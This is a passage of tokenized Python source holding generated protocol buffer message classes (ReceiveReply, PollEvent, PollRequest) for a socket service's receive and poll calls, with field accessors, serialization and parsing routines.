has_socket_descriptor_ : return <NUM_LIT:0> <EOL> if self . has_socket_descriptor_ and self . socket_descriptor_ != x . socket_descriptor_ : return <NUM_LIT:0> <EOL> if self . has_data_size_ != x . has_data_size_ : return <NUM_LIT:0> <EOL> if self . has_data_size_ and self . data_size_ != x . data_size_ : return <NUM_LIT:0> <EOL> if self . has_flags_ != x . has_flags_ : return <NUM_LIT:0> <EOL> if self . has_flags_ and self . flags_ != x . 
flags_ : return <NUM_LIT:0> <EOL> if self . has_timeout_seconds_ != x . has_timeout_seconds_ : return <NUM_LIT:0> <EOL> if self . has_timeout_seconds_ and self . timeout_seconds_ != x . timeout_seconds_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( not self . has_socket_descriptor_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> if ( not self . has_data_size_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += self . lengthString ( len ( self . socket_descriptor_ ) ) <EOL> n += self . lengthVarInt64 ( self . data_size_ ) <EOL> if ( self . has_flags_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . flags_ ) <EOL> if ( self . has_timeout_seconds_ ) : n += <NUM_LIT:9> <EOL> return n + <NUM_LIT:2> <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_socket_descriptor_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthString ( len ( self . socket_descriptor_ ) ) <EOL> if ( self . has_data_size_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthVarInt64 ( self . data_size_ ) <EOL> if ( self . has_flags_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . flags_ ) <EOL> if ( self . has_timeout_seconds_ ) : n += <NUM_LIT:9> <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_socket_descriptor ( ) <EOL> self . clear_data_size ( ) <EOL> self . clear_flags ( ) <EOL> self . clear_timeout_seconds ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . socket_descriptor_ ) <EOL> out . putVarInt32 ( <NUM_LIT:16> ) <EOL> out . putVarInt32 ( self . data_size_ ) <EOL> if ( self . has_flags_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . 
putVarInt32 ( self . flags_ ) <EOL> if ( self . has_timeout_seconds_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putDouble ( self . timeout_seconds_ ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_socket_descriptor_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . socket_descriptor_ ) <EOL> if ( self . has_data_size_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:16> ) <EOL> out . putVarInt32 ( self . data_size_ ) <EOL> if ( self . has_flags_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . flags_ ) <EOL> if ( self . has_timeout_seconds_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putDouble ( self . timeout_seconds_ ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> self . set_socket_descriptor ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT:16> : <EOL> self . set_data_size ( d . getVarInt32 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_flags ( d . getVarInt32 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_timeout_seconds ( d . getDouble ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_socket_descriptor_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . socket_descriptor_ ) ) <EOL> if self . has_data_size_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt32 ( self . data_size_ ) ) <EOL> if self . has_flags_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt32 ( self . flags_ ) ) <EOL> if self . has_timeout_seconds_ : res += prefix + ( "<STR_LIT>" % self . DebugFormat ( self . 
timeout_seconds_ ) ) <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> ksocket_descriptor = <NUM_LIT:1> <EOL> kdata_size = <NUM_LIT:2> <EOL> kflags = <NUM_LIT:3> <EOL> ktimeout_seconds = <NUM_LIT:5> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> <NUM_LIT:5> : "<STR_LIT>" , <EOL> } , <NUM_LIT:5> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:3> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:5> : ProtocolBuffer . Encoder . DOUBLE , <EOL> } , <NUM_LIT:5> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class ReceiveReply ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_stream_offset_ = <NUM_LIT:0> <EOL> stream_offset_ = <NUM_LIT:0> <EOL> has_data_ = <NUM_LIT:0> <EOL> data_ = "<STR_LIT>" <EOL> has_received_from_ = <NUM_LIT:0> <EOL> received_from_ = None <EOL> has_buffer_size_ = <NUM_LIT:0> <EOL> buffer_size_ = <NUM_LIT:0> <EOL> def __init__ ( self , contents = None ) : <EOL> self . lazy_init_lock_ = thread . allocate_lock ( ) <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def stream_offset ( self ) : return self . stream_offset_ <EOL> def set_stream_offset ( self , x ) : <EOL> self . has_stream_offset_ = <NUM_LIT:1> <EOL> self . stream_offset_ = x <EOL> def clear_stream_offset ( self ) : <EOL> if self . has_stream_offset_ : <EOL> self . has_stream_offset_ = <NUM_LIT:0> <EOL> self . stream_offset_ = <NUM_LIT:0> <EOL> def has_stream_offset ( self ) : return self . 
has_stream_offset_ <EOL> def data ( self ) : return self . data_ <EOL> def set_data ( self , x ) : <EOL> self . has_data_ = <NUM_LIT:1> <EOL> self . data_ = x <EOL> def clear_data ( self ) : <EOL> if self . has_data_ : <EOL> self . has_data_ = <NUM_LIT:0> <EOL> self . data_ = "<STR_LIT>" <EOL> def has_data ( self ) : return self . has_data_ <EOL> def received_from ( self ) : <EOL> if self . received_from_ is None : <EOL> self . lazy_init_lock_ . acquire ( ) <EOL> try : <EOL> if self . received_from_ is None : self . received_from_ = AddressPort ( ) <EOL> finally : <EOL> self . lazy_init_lock_ . release ( ) <EOL> return self . received_from_ <EOL> def mutable_received_from ( self ) : self . has_received_from_ = <NUM_LIT:1> ; return self . received_from ( ) <EOL> def clear_received_from ( self ) : <EOL> if self . has_received_from_ : <EOL> self . has_received_from_ = <NUM_LIT:0> ; <EOL> if self . received_from_ is not None : self . received_from_ . Clear ( ) <EOL> def has_received_from ( self ) : return self . has_received_from_ <EOL> def buffer_size ( self ) : return self . buffer_size_ <EOL> def set_buffer_size ( self , x ) : <EOL> self . has_buffer_size_ = <NUM_LIT:1> <EOL> self . buffer_size_ = x <EOL> def clear_buffer_size ( self ) : <EOL> if self . has_buffer_size_ : <EOL> self . has_buffer_size_ = <NUM_LIT:0> <EOL> self . buffer_size_ = <NUM_LIT:0> <EOL> def has_buffer_size ( self ) : return self . has_buffer_size_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_stream_offset ( ) ) : self . set_stream_offset ( x . stream_offset ( ) ) <EOL> if ( x . has_data ( ) ) : self . set_data ( x . data ( ) ) <EOL> if ( x . has_received_from ( ) ) : self . mutable_received_from ( ) . MergeFrom ( x . received_from ( ) ) <EOL> if ( x . has_buffer_size ( ) ) : self . set_buffer_size ( x . buffer_size ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_stream_offset_ != x . 
has_stream_offset_ : return <NUM_LIT:0> <EOL> if self . has_stream_offset_ and self . stream_offset_ != x . stream_offset_ : return <NUM_LIT:0> <EOL> if self . has_data_ != x . has_data_ : return <NUM_LIT:0> <EOL> if self . has_data_ and self . data_ != x . data_ : return <NUM_LIT:0> <EOL> if self . has_received_from_ != x . has_received_from_ : return <NUM_LIT:0> <EOL> if self . has_received_from_ and self . received_from_ != x . received_from_ : return <NUM_LIT:0> <EOL> if self . has_buffer_size_ != x . has_buffer_size_ : return <NUM_LIT:0> <EOL> if self . has_buffer_size_ and self . buffer_size_ != x . buffer_size_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( self . has_received_from_ and not self . received_from_ . IsInitialized ( debug_strs ) ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_stream_offset_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . stream_offset_ ) <EOL> if ( self . has_data_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . data_ ) ) <EOL> if ( self . has_received_from_ ) : n += <NUM_LIT:1> + self . lengthString ( self . received_from_ . ByteSize ( ) ) <EOL> if ( self . has_buffer_size_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . buffer_size_ ) <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_stream_offset_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . stream_offset_ ) <EOL> if ( self . has_data_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . data_ ) ) <EOL> if ( self . has_received_from_ ) : n += <NUM_LIT:1> + self . lengthString ( self . received_from_ . ByteSizePartial ( ) ) <EOL> if ( self . has_buffer_size_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . buffer_size_ ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_stream_offset ( ) <EOL> self . 
clear_data ( ) <EOL> self . clear_received_from ( ) <EOL> self . clear_buffer_size ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> if ( self . has_stream_offset_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:16> ) <EOL> out . putVarInt64 ( self . stream_offset_ ) <EOL> if ( self . has_data_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . data_ ) <EOL> if ( self . has_received_from_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . received_from_ . ByteSize ( ) ) <EOL> self . received_from_ . OutputUnchecked ( out ) <EOL> if ( self . has_buffer_size_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . buffer_size_ ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_stream_offset_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:16> ) <EOL> out . putVarInt64 ( self . stream_offset_ ) <EOL> if ( self . has_data_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . data_ ) <EOL> if ( self . has_received_from_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . received_from_ . ByteSizePartial ( ) ) <EOL> self . received_from_ . OutputPartial ( out ) <EOL> if ( self . has_buffer_size_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . buffer_size_ ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:16> : <EOL> self . set_stream_offset ( d . getVarInt64 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_data ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . mutable_received_from ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_buffer_size ( d . 
getVarInt32 ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_stream_offset_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt64 ( self . stream_offset_ ) ) <EOL> if self . has_data_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . data_ ) ) <EOL> if self . has_received_from_ : <EOL> res += prefix + "<STR_LIT>" <EOL> res += self . received_from_ . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> if self . has_buffer_size_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt32 ( self . buffer_size_ ) ) <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kstream_offset = <NUM_LIT:2> <EOL> kdata = <NUM_LIT:3> <EOL> kreceived_from = <NUM_LIT:4> <EOL> kbuffer_size = <NUM_LIT:5> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT:data>" , <EOL> <NUM_LIT:4> : "<STR_LIT>" , <EOL> <NUM_LIT:5> : "<STR_LIT>" , <EOL> } , <NUM_LIT:5> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:3> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:4> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:5> : ProtocolBuffer . Encoder . NUMERIC , <EOL> } , <NUM_LIT:5> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class PollEvent ( ProtocolBuffer . 
ProtocolMessage ) : <EOL> SOCKET_POLLNONE = <NUM_LIT:0> <EOL> SOCKET_POLLIN = <NUM_LIT:1> <EOL> SOCKET_POLLPRI = <NUM_LIT:2> <EOL> SOCKET_POLLOUT = <NUM_LIT:4> <EOL> SOCKET_POLLERR = <NUM_LIT:8> <EOL> SOCKET_POLLHUP = <NUM_LIT:16> <EOL> SOCKET_POLLNVAL = <NUM_LIT:32> <EOL> SOCKET_POLLRDNORM = <NUM_LIT:64> <EOL> SOCKET_POLLRDBAND = <NUM_LIT> <EOL> SOCKET_POLLWRNORM = <NUM_LIT> <EOL> SOCKET_POLLWRBAND = <NUM_LIT> <EOL> SOCKET_POLLMSG = <NUM_LIT> <EOL> SOCKET_POLLREMOVE = <NUM_LIT> <EOL> SOCKET_POLLRDHUP = <NUM_LIT> <EOL> _PollEventFlag_NAMES = { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:4> : "<STR_LIT>" , <EOL> <NUM_LIT:8> : "<STR_LIT>" , <EOL> <NUM_LIT:16> : "<STR_LIT>" , <EOL> <NUM_LIT:32> : "<STR_LIT>" , <EOL> <NUM_LIT:64> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> } <EOL> def PollEventFlag_Name ( cls , x ) : return cls . _PollEventFlag_NAMES . get ( x , "<STR_LIT>" ) <EOL> PollEventFlag_Name = classmethod ( PollEventFlag_Name ) <EOL> has_socket_descriptor_ = <NUM_LIT:0> <EOL> socket_descriptor_ = "<STR_LIT>" <EOL> has_requested_events_ = <NUM_LIT:0> <EOL> requested_events_ = <NUM_LIT:0> <EOL> has_observed_events_ = <NUM_LIT:0> <EOL> observed_events_ = <NUM_LIT:0> <EOL> def __init__ ( self , contents = None ) : <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def socket_descriptor ( self ) : return self . socket_descriptor_ <EOL> def set_socket_descriptor ( self , x ) : <EOL> self . has_socket_descriptor_ = <NUM_LIT:1> <EOL> self . socket_descriptor_ = x <EOL> def clear_socket_descriptor ( self ) : <EOL> if self . has_socket_descriptor_ : <EOL> self . has_socket_descriptor_ = <NUM_LIT:0> <EOL> self . socket_descriptor_ = "<STR_LIT>" <EOL> def has_socket_descriptor ( self ) : return self . 
has_socket_descriptor_ <EOL> def requested_events ( self ) : return self . requested_events_ <EOL> def set_requested_events ( self , x ) : <EOL> self . has_requested_events_ = <NUM_LIT:1> <EOL> self . requested_events_ = x <EOL> def clear_requested_events ( self ) : <EOL> if self . has_requested_events_ : <EOL> self . has_requested_events_ = <NUM_LIT:0> <EOL> self . requested_events_ = <NUM_LIT:0> <EOL> def has_requested_events ( self ) : return self . has_requested_events_ <EOL> def observed_events ( self ) : return self . observed_events_ <EOL> def set_observed_events ( self , x ) : <EOL> self . has_observed_events_ = <NUM_LIT:1> <EOL> self . observed_events_ = x <EOL> def clear_observed_events ( self ) : <EOL> if self . has_observed_events_ : <EOL> self . has_observed_events_ = <NUM_LIT:0> <EOL> self . observed_events_ = <NUM_LIT:0> <EOL> def has_observed_events ( self ) : return self . has_observed_events_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_socket_descriptor ( ) ) : self . set_socket_descriptor ( x . socket_descriptor ( ) ) <EOL> if ( x . has_requested_events ( ) ) : self . set_requested_events ( x . requested_events ( ) ) <EOL> if ( x . has_observed_events ( ) ) : self . set_observed_events ( x . observed_events ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_socket_descriptor_ != x . has_socket_descriptor_ : return <NUM_LIT:0> <EOL> if self . has_socket_descriptor_ and self . socket_descriptor_ != x . socket_descriptor_ : return <NUM_LIT:0> <EOL> if self . has_requested_events_ != x . has_requested_events_ : return <NUM_LIT:0> <EOL> if self . has_requested_events_ and self . requested_events_ != x . requested_events_ : return <NUM_LIT:0> <EOL> if self . has_observed_events_ != x . has_observed_events_ : return <NUM_LIT:0> <EOL> if self . has_observed_events_ and self . observed_events_ != x . 
observed_events_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( not self . has_socket_descriptor_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> if ( not self . has_requested_events_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> if ( not self . has_observed_events_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += self . lengthString ( len ( self . socket_descriptor_ ) ) <EOL> n += self . lengthVarInt64 ( self . requested_events_ ) <EOL> n += self . lengthVarInt64 ( self . observed_events_ ) <EOL> return n + <NUM_LIT:3> <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_socket_descriptor_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthString ( len ( self . socket_descriptor_ ) ) <EOL> if ( self . has_requested_events_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthVarInt64 ( self . requested_events_ ) <EOL> if ( self . has_observed_events_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthVarInt64 ( self . observed_events_ ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_socket_descriptor ( ) <EOL> self . clear_requested_events ( ) <EOL> self . clear_observed_events ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . socket_descriptor_ ) <EOL> out . putVarInt32 ( <NUM_LIT:16> ) <EOL> out . putVarInt32 ( self . requested_events_ ) <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . observed_events_ ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_socket_descriptor_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . 
putPrefixedString ( self . socket_descriptor_ ) <EOL> if ( self . has_requested_events_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:16> ) <EOL> out . putVarInt32 ( self . requested_events_ ) <EOL> if ( self . has_observed_events_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . observed_events_ ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> self . set_socket_descriptor ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT:16> : <EOL> self . set_requested_events ( d . getVarInt32 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_observed_events ( d . getVarInt32 ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_socket_descriptor_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . socket_descriptor_ ) ) <EOL> if self . has_requested_events_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt32 ( self . requested_events_ ) ) <EOL> if self . has_observed_events_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt32 ( self . observed_events_ ) ) <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> ksocket_descriptor = <NUM_LIT:1> <EOL> krequested_events = <NUM_LIT:2> <EOL> kobserved_events = <NUM_LIT:3> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> } , <NUM_LIT:3> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . 
STRING , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:3> : ProtocolBuffer . Encoder . NUMERIC , <EOL> } , <NUM_LIT:3> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class PollRequest ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_timeout_seconds_ = <NUM_LIT:0> <EOL> timeout_seconds_ = - <NUM_LIT:1.0> <EOL> def __init__ ( self , contents = None ) : <EOL> self . events_ = [ ] <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def events_size ( self ) : return len ( self . events_ ) <EOL> def events_list ( self ) : return self . events_ <EOL> def events ( self , i ) : <EOL> return self . events_ [ i ] <EOL> def mutable_events ( self , i ) : <EOL> return self . events_ [ i ] <EOL> def add_events ( self ) : <EOL> x = PollEvent ( ) <EOL> self . events_ . append ( x ) <EOL> return x <EOL> def clear_events ( self ) : <EOL> self . events_ = [ ] <EOL> def timeout_seconds ( self ) : return self . timeout_seconds_ <EOL> def set_timeout_seconds ( self , x ) : <EOL> self . has_timeout_seconds_ = <NUM_LIT:1> <EOL> self . timeout_seconds_ = x <EOL> def clear_timeout_seconds ( self ) : <EOL> if self . has_timeout_seconds_ : <EOL> self . has_timeout_seconds_ = <NUM_LIT:0> <EOL> self . timeout_seconds_ = - <NUM_LIT:1.0> <EOL> def has_timeout_seconds ( self ) : return self . has_timeout_seconds_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> for i in xrange ( x . events_size ( ) ) : self . add_events ( ) . CopyFrom ( x . events ( i ) ) <EOL> if ( x . has_timeout_seconds ( ) ) : self . set_timeout_seconds ( x . timeout_seconds ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if len ( self . events_ ) != len ( x . events_ ) : return <NUM_LIT:0> <EOL> for e1 , e2 in zip ( self . events_ , x . events_ ) : <EOL> if e1 != e2 : return <NUM_LIT:0> <EOL> if self . 
has_timeout_seconds_ != x . has_timeout_seconds_ : return <NUM_LIT:0> <EOL> if self . has_timeout_seconds_ and self . timeout_seconds_ != x . timeout_seconds_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> for p in self . events_ : <EOL> if not p . IsInitialized ( debug_strs ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += <NUM_LIT:1> * len ( self . events_ ) <EOL> for i in xrange ( len ( self . events_ ) ) : n += self . lengthString ( self . events_ [ i ] . ByteSize ( ) ) <EOL> if ( self . has_timeout_seconds_ ) : n += <NUM_LIT:9> <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += <NUM_LIT:1> * len ( self . events_ ) <EOL> for i in xrange ( len ( self . events_ ) ) : n += self . lengthString ( self . events_ [ i ] . ByteSizePartial ( ) ) <EOL> if ( self . has_timeout_seconds_ ) : n += <NUM_LIT:9> <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_events ( ) <EOL> self . clear_timeout_seconds ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> for i in xrange ( len ( self . events_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putVarInt32 ( self . events_ [ i ] . ByteSize ( ) ) <EOL> self . events_ [ i ] . OutputUnchecked ( out ) <EOL> if ( self . has_timeout_seconds_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putDouble ( self . timeout_seconds_ ) <EOL> def OutputPartial ( self , out ) : <EOL> for i in xrange ( len ( self . events_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putVarInt32 ( self . events_ [ i ] . ByteSizePartial ( ) ) <EOL> self . events_ [ i ] . OutputPartial ( out ) <EOL> if ( self . has_timeout_seconds_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putDouble ( self . timeout_seconds_ ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . 
